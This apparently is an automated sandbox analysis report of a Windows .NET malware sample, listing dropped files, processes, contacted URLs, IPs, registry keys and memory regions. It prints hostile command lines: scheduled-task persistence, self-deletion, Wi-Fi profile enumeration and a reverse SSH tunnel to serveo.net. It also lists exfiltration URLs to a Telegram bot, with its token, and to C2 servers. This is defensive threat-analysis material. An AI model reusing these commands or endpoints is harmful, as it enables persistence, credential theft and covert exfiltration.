Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
0LpFv1haTA.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_0LpFv1haTA.exe_308cea159c14f9b5b03db652f16eb04856bea_a7b8af99_77488a70-eb7c-42ac-8dd0-e13389be6d52\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0LpFv1haTA.exe.log
|
CSV text
|
modified
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmp4A67.tmp
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\manager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER895A.tmp.dmp
|
Mini DuMP crash report, 16 streams, Fri Sep 27 21:27:18 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CA6.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CE6.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\.ssh\known_hosts
|
ASCII text, with very long lines (404), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\manager.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\helloworld.txt
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\phgsswc3mw\p.dat
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\phgsswc3mw\report.lock
|
very short file (no magic)
|
dropped
|
||
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\0LpFv1haTA.exe
|
"C:\Users\user\Desktop\0LpFv1haTA.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
/rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
|
||
C:\Windows\System32\schtasks.exe
|
schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profiles
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show networks mode=bssid
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profiles
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show networks mode=bssid
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
||
C:\Users\user\AppData\Roaming\manager.exe
|
"C:\Users\user\AppData\Roaming\manager.exe"
|
||
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
|
"C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
|
||
C:\Windows\SysWOW64\schtasks.exe
|
"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
|
||
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
|
C:\Users\user\AppData\Roaming\XenoManager\manager.exe
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
||
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\timeout.exe
|
timeout /t 3
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr "SSID BSSID Signal"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\OpenSSH\ssh.exe
|
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr "SSID BSSID Signal"
|
||
C:\Windows\System32\OpenSSH\ssh.exe
|
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 32 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
|
149.154.167.220
|
||
https://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
|
149.154.167.220
|
||
http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ==
|
185.253.7.60
|
||
http://185.253.7.60:8080//mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE
|
185.253.7.60
|
||
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
|
149.154.167.220
|
||
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage
|
unknown
|
||
https://api.tele
|
unknown
|
||
193.149.187.135
|
|||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
http://185.217.98.121:80
|
unknown
|
||
https://138.2.92.67:443
|
unknown
|
||
http://176.9.149.76:8051
|
unknown
|
||
http://202.120.7.24:54321
|
unknown
|
||
http://123.30.140.234:9080
|
unknown
|
||
http://20.78.55.47:8080
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
http://167.99.138.249:8080/K7IvH_user%40051829_report.wsr
|
unknown
|
||
http://185.253.7.60:8080
|
unknown
|
||
http://107.161.20.142:8080
|
unknown
|
||
https://5.196.181.135:443
|
unknown
|
||
https://44.228.161.50:443
|
unknown
|
||
https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net/
|
unknown
|
||
https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net
|
unknown
|
||
https://192.99.196.191:443
|
unknown
|
||
http://ip-api.com/line?fields=query,country
|
208.95.112.1
|
||
http://167.99.138.249:80802
|
unknown
|
||
https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net
|
unknown
|
||
http://18.228.80.130:80
|
unknown
|
||
http://167.99.138.249
|
unknown
|
||
http://194.5.152.106:8080
|
unknown
|
||
http://66.42.56.128:80
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
http://167.99.138.249:8080
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
http://51.178.38.93:8080
|
unknown
|
||
http://185.253.7.60:80802
|
unknown
|
||
http://45.184.180.226:8080
|
unknown
|
||
http://185.217.98.121:8080
|
unknown
|
||
http://8.219.110.16:9999
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://185.253.7.60:8080/
|
unknown
|
||
http://47.96.78.224:8080
|
unknown
|
||
https://node.trezor.io
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://185.80.128.17/manager.exe
|
185.80.128.17
|
||
http://95.216.147.179:80
|
unknown
|
||
http://185.253.7.60:8080//sendData
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://188.120.242.78:8817
|
unknown
|
||
https://154.9.207.142:443
|
unknown
|
||
http://127.0.0.1:21325/enumerate
|
unknown
|
||
http://167.99.138.249:8080/%4B%37%49%76%48%5F%61%6C%66%6F%6E%73%40%30%35%31%38%32%39%5F%72%65%70%6F%
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://upx.sf.net
|
unknown
|
||
https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net/
|
unknown
|
||
http://127.0.0.1:7634/
|
unknown
|
||
http://ip-api.com/line?fields=query
|
unknown
|
||
http://159.203.174.113:8090
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://185.217.98.121:443
|
unknown
|
||
http://185.253.7.60:8080/8
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
http://116.202.101.219:8080
|
unknown
|
||
http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&u
|
unknown
|
||
https://46.51.231.213:443
|
unknown
|
||
http://127.0.0.1:
|
unknown
|
||
http://38.60.191.38:80
|
unknown
|
||
http://167.99.138.249:8080/K7IvH_user
|
unknown
|
||
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578
|
unknown
|
||
https://support.mozilla.org/product
|
unknown
|
||
http://206.189.109.146:80
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
http://8f7482867cc6a5aec99ead5e72d7016e.serveo.net:7634//8f7482867cc6a5aec99ead5e72d7016e.serveo.net
|
unknown
|
||
http://45.82.65.63:80
|
unknown
|
||
https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
|
unknown
|
||
http://41.87.207.180:9090
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
http://3.12.151.253:80
|
unknown
|
There are 73 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
api.telegram.org
|
149.154.167.220
|
||
serveo.net
|
138.68.79.95
|
||
ip-api.com
|
208.95.112.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
188.120.242.78
|
unknown
|
Russian Federation
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
206.189.109.146
|
unknown
|
United States
|
||
193.149.187.135
|
unknown
|
Denmark
|
||
167.99.138.249
|
unknown
|
United States
|
||
185.253.7.60
|
unknown
|
Russian Federation
|
||
45.82.65.63
|
unknown
|
United Kingdom
|
||
185.80.128.17
|
unknown
|
Lithuania
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
138.68.79.95
|
serveo.net
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
There are 1 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\0LpFv1haTA_RASMANCS
|
FileDirectory
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
ProgramId
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
FileId
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
LowerCaseLongPath
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
LongPathHash
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
Name
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
OriginalFileName
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
Publisher
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
Version
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
BinFileVersion
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
BinaryType
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
ProductName
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
ProductVersion
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
LinkDate
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
BinProductVersion
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
AppxPackageFullName
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
Size
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
Language
|
||
\REGISTRY\A\{7d6777e6-3e27-94a5-7283-0440454fe79d}\Root\InventoryApplicationFile\0lpfv1hata.exe|9f27badff8a4fb34
|
Usn
|
There are 23 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
242000
|
unkown
|
page readonly
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
1E459EA1000
|
trusted library allocation
|
page read and write
|
||
1ADB3610000
|
heap
|
page execute and read and write
|
||
1ADB3577000
|
heap
|
page read and write
|
||
A3F09FE000
|
stack
|
page read and write
|
||
2310E2EA000
|
heap
|
page read and write
|
||
A3EFAED000
|
stack
|
page read and write
|
||
19233110000
|
trusted library allocation
|
page read and write
|
||
1E449F47000
|
trusted library allocation
|
page read and write
|
||
BB064FC000
|
stack
|
page read and write
|
||
21F12DBD000
|
trusted library allocation
|
page read and write
|
||
1E462735000
|
heap
|
page read and write
|
||
361A7FE000
|
stack
|
page read and write
|
||
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
1B2B14B7000
|
trusted library allocation
|
page read and write
|
||
19232ED5000
|
heap
|
page read and write
|
||
1ADB50E7000
|
trusted library allocation
|
page read and write
|
||
1ADB354B000
|
heap
|
page read and write
|
||
21F2A5F2000
|
heap
|
page read and write
|
||
21F12C9D000
|
trusted library allocation
|
page read and write
|
||
1E44A26A000
|
trusted library allocation
|
page read and write
|
||
21F2A8B3000
|
heap
|
page read and write
|
||
1E44813A000
|
heap
|
page read and write
|
||
21F0F870000
|
heap
|
page execute and read and write
|
||
FD8E3DF000
|
stack
|
page read and write
|
||
F10000
|
trusted library allocation
|
page read and write
|
||
32AE000
|
trusted library allocation
|
page read and write
|
||
20D7367A000
|
heap
|
page read and write
|
||
21F12E3B000
|
trusted library allocation
|
page read and write
|
||
2898B599000
|
trusted library allocation
|
page read and write
|
||
21F12CCB000
|
trusted library allocation
|
page read and write
|
||
21F12D67000
|
trusted library allocation
|
page read and write
|
||
21F22135000
|
trusted library allocation
|
page read and write
|
||
21F2AEA4000
|
heap
|
page read and write
|
||
1ADB352B000
|
heap
|
page read and write
|
||
50CB39E000
|
stack
|
page read and write
|
||
19457E13000
|
heap
|
page read and write
|
||
2898B3A3000
|
trusted library allocation
|
page read and write
|
||
1ADB354D000
|
heap
|
page read and write
|
||
1E45A511000
|
trusted library allocation
|
page read and write
|
||
3501000
|
trusted library allocation
|
page read and write
|
||
20947780000
|
heap
|
page read and write
|
||
678000
|
heap
|
page read and write
|
||
57272FE000
|
unkown
|
page read and write
|
||
21F12D7F000
|
trusted library allocation
|
page read and write
|
||
1E45A4A3000
|
trusted library allocation
|
page read and write
|
||
2898B349000
|
trusted library allocation
|
page read and write
|
||
1E449B20000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
21F2AF3D000
|
heap
|
page read and write
|
||
21F0F8A0000
|
heap
|
page read and write
|
||
2898B3B1000
|
trusted library allocation
|
page read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
1D13585A000
|
heap
|
page read and write
|
||
21F2AEB8000
|
heap
|
page read and write
|
||
BB066FF000
|
stack
|
page read and write
|
||
1D291DA0000
|
heap
|
page read and write
|
||
1E44A2CD000
|
trusted library allocation
|
page read and write
|
||
1E45AD67000
|
trusted library allocation
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
1E462480000
|
heap
|
page read and write
|
||
21F12E29000
|
trusted library allocation
|
page read and write
|
||
3241000
|
trusted library allocation
|
page read and write
|
||
361B1FA000
|
stack
|
page read and write
|
||
21F12C6B000
|
trusted library allocation
|
page read and write
|
||
1B2B169B000
|
trusted library allocation
|
page read and write
|
||
1ADB38C5000
|
heap
|
page read and write
|
||
3080000
|
trusted library allocation
|
page read and write
|
||
21F2BF78000
|
heap
|
page read and write
|
||
2898B3B9000
|
trusted library allocation
|
page read and write
|
||
21F2A936000
|
heap
|
page read and write
|
||
217C8FF000
|
stack
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page execute and read and write
|
||
21F12CD9000
|
trusted library allocation
|
page read and write
|
||
21F29EA0000
|
heap
|
page read and write
|
||
21F12D4B000
|
trusted library allocation
|
page read and write
|
||
1E45A437000
|
trusted library allocation
|
page read and write
|
||
361B6FC000
|
stack
|
page read and write
|
||
1E449F06000
|
trusted library allocation
|
page read and write
|
||
21F12ED9000
|
trusted library allocation
|
page read and write
|
||
1C8FA580000
|
heap
|
page read and write
|
||
21F12D2F000
|
trusted library allocation
|
page read and write
|
||
2898B399000
|
trusted library allocation
|
page read and write
|
||
7FF848F89000
|
trusted library allocation
|
page read and write
|
||
21F2BEB4000
|
heap
|
page read and write
|
||
21F12C9F000
|
trusted library allocation
|
page read and write
|
||
21F2A23B000
|
heap
|
page read and write
|
||
1B2B1796000
|
trusted library allocation
|
page read and write
|
||
29974E60000
|
heap
|
page read and write
|
||
21F2B0C6000
|
heap
|
page read and write
|
||
21F12E6F000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
21F2B108000
|
heap
|
page read and write
|
||
1B2AFB40000
|
heap
|
page read and write
|
||
21F12EE9000
|
trusted library allocation
|
page read and write
|
||
1E44A098000
|
trusted library allocation
|
page read and write
|
||
1B2B14BB000
|
trusted library allocation
|
page read and write
|
||
1E45A55C000
|
trusted library allocation
|
page read and write
|
||
21F29B6F000
|
heap
|
page read and write
|
||
1ADB540B000
|
trusted library allocation
|
page read and write
|
||
2898B58A000
|
trusted library allocation
|
page read and write
|
||
83EBCFB000
|
stack
|
page read and write
|
||
21F12D2B000
|
trusted library allocation
|
page read and write
|
||
21F2B7E2000
|
heap
|
page read and write
|
||
1ADB50DD000
|
trusted library allocation
|
page read and write
|
||
9AF3DFE000
|
stack
|
page read and write
|
||
21F12EB9000
|
trusted library allocation
|
page read and write
|
||
1E459D58000
|
trusted library allocation
|
page read and write
|
||
1B2AF9CB000
|
heap
|
page read and write
|
||
1E459D64000
|
trusted library allocation
|
page read and write
|
||
D60000
|
trusted library allocation
|
page read and write
|
||
1E462400000
|
trusted library allocation
|
page read and write
|
||
1B2AF92A000
|
heap
|
page read and write
|
||
21F29210000
|
trusted library allocation
|
page read and write
|
||
21F12E11000
|
trusted library allocation
|
page read and write
|
||
21F12EE7000
|
trusted library allocation
|
page read and write
|
||
28D85038000
|
heap
|
page read and write
|
||
21F2A80D000
|
heap
|
page read and write
|
||
1E45B46B000
|
trusted library allocation
|
page read and write
|
||
1ADB5361000
|
trusted library allocation
|
page read and write
|
||
21F12CED000
|
trusted library allocation
|
page read and write
|
||
1B2AF8C0000
|
heap
|
page read and write
|
||
469E000
|
stack
|
page read and write
|
||
361B7FE000
|
stack
|
page read and write
|
||
21F2AFDC000
|
heap
|
page read and write
|
||
22B163E9000
|
heap
|
page read and write
|
||
23F68035000
|
heap
|
page read and write
|
||
83EBDFE000
|
stack
|
page read and write
|
||
1E461D70000
|
trusted library allocation
|
page read and write
|
||
1E459F48000
|
trusted library allocation
|
page read and write
|
||
1684000
|
trusted library allocation
|
page read and write
|
||
1E449EA5000
|
trusted library allocation
|
page read and write
|
||
A3EFDFF000
|
stack
|
page read and write
|
||
1E44A2BC000
|
trusted library allocation
|
page read and write
|
||
19457E92000
|
heap
|
page read and write
|
||
521E000
|
stack
|
page read and write
|
||
1E449DE4000
|
trusted library allocation
|
page read and write
|
||
21F12EC7000
|
trusted library allocation
|
page read and write
|
||
21F12CEF000
|
trusted library allocation
|
